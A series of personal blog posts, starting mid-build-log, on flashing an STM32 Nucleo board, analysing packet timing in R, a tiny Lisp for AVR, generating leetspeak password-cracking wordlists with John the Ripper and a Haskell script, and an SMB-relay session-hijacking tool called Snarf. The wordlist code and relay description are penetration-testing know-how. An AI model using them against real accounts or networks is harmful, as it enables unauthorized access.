mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/board.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_hash.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_adc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_iwdg.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_flash_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rtc_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_nor.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2s.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/system_stm32f4xx.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sdram.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pcd.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_uart.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2c.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_cortex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rtc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_ltdc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_tim.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_usb.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_hash_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rcc_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/retarget.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/mbed_overrides.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dma.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/startup_STM32F41x.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_can.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dma2d.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dac.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_flash_ramfunc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_crc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pwr.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_wwdg.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2c_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_cryp_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_nand.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_usart.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dcmi.o -lmbed  -lstdc++ -lsupc++ -lm -lc -lgcc -lnosys -lmbed  -lstdc++ -lsupc++ -lm -lc -lgcc -lnosys
arm-none-eabi-size Nucleo_blink_led.elf
   text    data     bss     dec     hex filename
  31456    2244     592   34292    85f4 Nucleo_blink_led.elf
make: warning:  Clock skew detected.  Your build may be incomplete.

The result is several files in your directory that we can use to debug the program and flash the microcontroller:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ ls -l
total 1240
-rw-r--r-- 1 josh josh    214 Nov 30  2014 main.cpp
-rw-rw-r-- 1 josh josh   9446 Nov 30 14:02 main.d
-rw-rw-r-- 1 josh josh  18232 Nov 30 14:02 main.o
-rw-r--r-- 1 josh josh   6884 Nov 30 14:01 Makefile
-rw-r--r-- 1 josh josh   6810 Nov 30 13:57 Makefile.orig
drwxrwxr-x 4 josh josh   4096 Nov 30 13:43 mbed
-rw-r--r-- 1 josh josh     65 Nov 30  2014 mbed.bld
-rwxrwxr-x 1 josh josh  33700 Nov 30 14:02 Nucleo_blink_led.bin
-rwxrwxr-x 1 josh josh 337694 Nov 30 14:02 Nucleo_blink_led.elf
-rw-rw-r-- 1 josh josh  94855 Nov 30 14:02 Nucleo_blink_led.hex
-rw-rw-r-- 1 josh josh 758946 Nov 30 14:02

Flash the Microcontroller

You will use OpenOCD to connect to the software debug port, where we can program the microcontroller’s flash memory. Start by connecting to the board using the configuration file for the hardware you’re using:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ openocd -f /usr/local/share/openocd/scripts/board/st_nucleo_f411re.cfg 
Open On-Chip Debugger 0.9.0-dev-00207-g9c4d294 (2014-11-27-10:42)
Licensed under GNU GPL v2
For bug reports, read
Info : The selected transport took over low-level target control. The results might differ compared to plain JTAG/SWD
adapter speed: 2000 kHz
adapter_nsrst_delay: 100
srst_only separate srst_nogate srst_open_drain connect_deassert_srst
Info : clock speed 2000 kHz
Info : STLINK v2 JTAG v22 API v2 SWIM v5 VID 0x0483 PID 0x374B
Info : using stlink api v2
Info : Target voltage: 3.263559
Info : stm32f4x.cpu: hardware has 6 breakpoints, 4 watchpoints

OpenOCD opens some TCP ports that you can use to connect different clients to the microcontroller. For example, on port 3333 is a remote debugger target for GDB (very handy!). We’re most interested in port 4444, though, where we can connect to run commands. Use telnet for this:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ telnet localhost 4444
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger

To program the flash, we need to run three commands. First, we halt the CPU:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread 
xPSR: 0x01000000 pc: 0x08001ad4 msp: 0x20020000

Now we write the Nucleo_blink_led.hex file to flash memory:

> flash write_image erase Nucleo_blink_led.hex
auto erase enabled
device id = 0x10006431
flash size = 512kbytes
wrote 49152 bytes from file Nucleo_blink_led.hex in 2.165905s (22.162 KiB/s)

And start the CPU at the entry point:

> reset run


And that’s it! It seems like a lot, but my initial testing suggests that the MBED SDK is the best way to get feet on the ground running with the Nucleo board. This environment lets me use all the normal C-programming infrastructure I’m used to, with Emacs for editing, using Makefiles, etc., for managing the build process.

One of the nice things is that this gives you the entire MBED SDK in your project directory. Check out the SDK documentation on the MBED site for details on how the different APIs work. You’ll find that in many ways it is more powerful than software frameworks for other embedded environments.

The Shape of Network Traffic

I am working on a (probably foolhardy) project to play with network traffic at a very low level. It’s hardware, and so I’m trying to estimate performance. Given a CPU with speed X and choosing parallel bus architecture Y on the MAC/PHY, how much time do I have to process a packet, etc., etc. Estimations are only worth the information you use for the basis, of course; so I collected a network capture from a pretty busy and large network so I could get some idea of what’s “normal”. I was quite interested in what showed up.

I’ll preface this, also, by saying I have no amazing analysis or conclusion here. Only the observation that there’s some interesting structure in packet flow, and it startled me. I certainly watch the packets fly by in Wireshark often enough, so I thought I had a good idea of what things would look like. I wanted to answer a key question for my project: how many microseconds do I have between packets to analyze (and manipulate) them? This influences decisions I’ll make about packet buffering and how complex I can make the processing stage.

So like I said, I collected this network capture. It’s about two hours of traffic from a production network with between 100 and 200 users. I extracted the timestamps from the PCAP and wrote a quick Ruby script to convert timestamps to delta-t values (and byte sizes, etc.). But how to visualize it? I pulled out GNU R, and thought I’d just try the default plot() command:

plot(d$Delta, pch=16, ylab=‘Time Between Packets (uS)’, main=“Plot of Time Deltas”)

That was interesting enough, but I could see several things. First, the data is spread out over a huge range: inter-packet times range from 0 to millions of microseconds. And lots of the data must be on the lower end, so I thought maybe I’ll rescale it with a logarithmic Y-axis. This should show me what the bottom looks like:

plot(d$Delta, pch=16, ylab=‘Time Between Packets (uS)’, main=“Plot of Time Deltas”, log=‘y’)

Wow, that’s just a ton of data. I don’t want to start aggregating it – I did try a histogram, and I basically get one big bar in the first bin and a long tail. Totally useless. Then I remembered a trick I ran into when I was running profitability metrics for delivered services at a previous company where I worked. I had thousands of data points, and I wanted to see instinctively how the shape really worked out. By setting the plotted points with a mostly-transparent color, they don’t just clobber each other like in the above graph. Check this out:

plot(d$Delta, pch=16, log=“y”, col=“#00888803”, main=“Packet Flow”, xlab=“Packet Index”, ylab=“Time Between Packets (uS)”)

And there we have it – a fantastic image. It shows that there are common streams of traffic that strike at very regular packet intervals. Temporal clusters with consistent bursts of packets of nearly constant timing. My guess is (without the much more complicated deeper analysis) that these horizontal stripes associate with traffic in-subnet, out-of-subnet, or by protocol. For example, TCP comms ACK every packet, so a TCP session should show up as pairs (or clusters) of packets tightly associated with each other. I simply had no idea there would be so much obvious structure in this somewhat non-sensical graph.

Here’s where I finally ended up. I had estimated, based on propagation delay timings on the MAC/PHY chip I am looking at, along with cycle times and MIPS/mHz for the CPU I’m planning to use, that I need a worst case of about 600 nanoseconds to read, process, and rewrite a packet byte. So I rerepresented this information as microseconds per byte, and plotted my line. I am confident that with “reasonable” buffering (the MAC/PHY buffers in its own memory, for example), I should be able to keep up with a real-world network.

Note also that this basically combines information about packet timing and packet size. I know that this trace includes a variety of interesting traffic:

  1. Port scans (I was portscanned, not doing the portscanning!)
  2. SMB file sharing
  3. Web browsing
  4. Tons of broadcast and multicast

By the way, for extra points, see if you can guess when my box was portscanned by looking at the sequence.

Lisp on an AVR?

I’m working on a new version of my USB HID testing rig. This one is a little more robust – i.e., not consisting of a bundle of Arduino shields and a breadboard. I’ve also started playing with more USB-related things, like using a raw HID to transfer data faster. As I’ve been experimenting, I’ve started thinking about the ultimate in usability. I really want to be able to script the behavior of the device dynamically, without having to reprogram it with new features.

So I worked a bit this evening on a very small Lisp interpreter for the AVR. So far, it’s not even running on the AVR – I’m simulating it on my Linux boxen. But the design of the interpreter is pointed at eventual implementation on AVR hardware.

There are, of course, a number of serious concessions to fit everything in a few kilobytes of RAM. There have been some other projects in this area, but even the most specifically targeted one I can find made too many concessions for my preferences. I want to be able to do things like define variables and iterate – maybe even user-definable functions, though RAM may not be sufficient for that. I envision the final product will allow me to write “builtin” functions in C for the AVR, and drive execution with interpreted kind-of-Lisp.

I will have no garbage collection – can’t afford it – but the interpreter will manage its own memory. By statically mapping a memory range for CONS cells and a symbol table, I can fix hard limits on how far a script can grow. But this will also allow me to ensure that everything fits on the AVR without having to implement malloc() and free().

A CONS cell is (currently) a triple, consisting of a type descriptor (one byte), the car (two bytes), and the cdr (one byte). No, I don’t plan on handling dotted franken-conses. All data types will map back to a cons, and I can calculate how many CONS cells take how much space, and keep it under control.

Here’s a simple “hello world” example in my current simulator. It’s a little more than hello world – it prints out a string (a sequence of chars) and the result of a little math – but still cool to experiment with how a realistic script might behave:

ULisp VM Test

Mutating Dictionaries

I was dinking around with mutating word lists to make password dictionaries this morning, and ran into a little hitch. Using John the Ripper, you can generate word lists using its mutation rules. It definitely works, as follows:

063014 09:38 :) josh $ wc -l words.txt
29016 words.txt
063014 09:38 :) josh $ john --wordlist=words.txt --rules --stdout > foo.txt
words: 1427525  time: 0:00:00:00 DONE (Fri Jul  4 04:47:53 2014)  w/s: 4758K  current: Zygoting
063014 09:38 :) josh $ wc -l foo.txt
1427525 foo.txt

So an expansion from 29k words to 1.4M words was fine… but there were some obvious ones missing. For example, the famous XKCD base password was missing:

063014 09:38 :) josh $ grep -i troubador words.txt
063014 09:38 :) josh $ grep Tr0ub4dor foo.txt
063014 09:38 :( (1) josh $

Now, I believe that it’s not too hard to modify John’s rules and configure your own. But I never take that path. After all, a day without coding is like a day without sunshine. So I wrote up a few scripts to do my own l33t mutations of dictionary words, and started with the code bumming. I did some timed runs, decided I wasn’t happy with the speed, etc., and then I thought maybe my code was a little long…

I had started with Ruby, but when I decided I wanted it faster I turned to one of my favorite languages, Haskell. It compiles to machine code, and should be about an order of magnitude faster than Ruby. And once I started optimizing, I started pulling out all of the weird little tricks you get with Haskell, and ended up with the following:

import Data.Char
import Data.List

leets = ["oO0*","aA4@","lL1!","eE3" ,"tT7" ,"iI1!","sS5"]

leetchar c []     = nub [c, toUpper c, toLower c]
leetchar c (l:ls) = if c `elem` l then l else leetchar c ls

leet []     = return []
leet (x:xs) = do
  p <- leetchar x leets
  n <- leet xs
  return $ p : n

main = do
  cs <- getContents
  mapM_ putStrLn (concatMap leet (lines cs))

Which works something like this:

$ echo password | ./leetspeak | head -n 10

And I think this was one of the most beautiful programs I have ever written. I’ve used the list monad before, but there’s something special about writing the imperative form of a program several times, then writing a nice functional one, and then having that dawning realization that what I’m trying to optimize is monadic in shape.

You see, the challenge in this program is not necessarily generating the different options for the characters. That’s easy – what’s a bit harder is generating all of the possible combinations of those options. A typical imperative solution keeps some sort of list of the words that have been generated so far and recursively works through each character in the word. This was the general pattern of my first solutions, but the code was so long.

The list monad in Haskell essentially abstracts away all of the boilerplate of that recursive function, and turns the “cartesian product” part of this calculation into a very concise function. My “leet” function from above:

leet []     = return []
leet (x:xs) = do
  p <- leetchar x leets
  n <- leet xs
  return $ p : n

The “bind” operator (the left arrow “<-” in the code above) basically makes the rest of the function into a loop, without having to specify all the loop details. And by making it recursive, I don’t even have to think about how long the word is (so no keeping track of indices and lengths!). By the time you get to the “return $ p : n” line, the program is at the bottom of a nested loop.

And what’s cool about the whole program (being as short as it is) is that GHC, when it compiles it, makes a very performant little resulting program. It takes me about half a minute to generate a gigabyte of mutated passwords. And due to lazy evaluation, it never takes more than a couple megabytes of memory (which is mostly Haskell space, not data space) (note that I’m also mutating case on all characters as well).

$ ./leetspeak < words.txt > dictionary.txt
$ wc -l dictionary.txt
 102395717 dictionary.txt

It’s not significant to “security”, but it’s at least a little reminder that there is always a best tool for any given job, and when you stumble onto the “right” solution it’s very satisfying.

Snarf Presentation at NOLAcon

tl;dr → Check out github and the NOLAcon 2014 presentation.

My esteemed colleague, Victor Mata, and I had the privilege to present our long-time research project, Snarf, at NOLAcon this past weekend. It was great to get everything together to share with others. Coincident with this presentation is the Github release of our source code, so others can experiment with the tool as well.

What is Snarf, you might ask? Think about SMB Relay (e.g., via the Spider Labs Responder), one of the most profitable attacks in the present penetration testing environment. This popular attack is supported by several tools, but is often sort of a “fire and forget” attack. If you happen to get an SMB connection, and it happens to be an admin user, and you happen to choose a system that doesn’t have AV (or you happened to choose a good payload), then it works, and you get control of a system on the network.

But what if it doesn’t happen so cleanly? Victor and I were frustrated that attacks like these are often a “one-shot” deal. We wanted to move SMB Relay from the exploitation phase to the discovery phase, and try to get utility out of middled connections that aren’t quite in the “sweet spot” described above. E.g., if you don’t have admin, you can at least still look at shares. And there are lots of SMB tools you might want to try – why can’t SMB relay let you do more?

Well, it can, but it took us a good bit of work. Along the way, we produced Snarf – a tool that middles a connection to an SMB server, but keeps the server connection when the client is done with it. We then present a localhost SMB server that authenticates any username/password, but then jacks in directly to the existing server connection that we stole from the client. You can connect any number of times, with any SMB tool (as long as it speaks the right dialect), experiment with payloads or post-exploitation exploration – all with only one connection. We just never throw away a usable connection!

What’s also cool is that this applies to lots of protocols. We have some working beta-ish code for MySQL, which we presented in our talk at NOLAcon (not integrated into the public source yet). The possibilities are really exciting for effectively demonstrating the need to secure network services during penetration tests.

For a little more, check out our NOLAcon 2014 presentation. You can also check out the (beta) code on Github.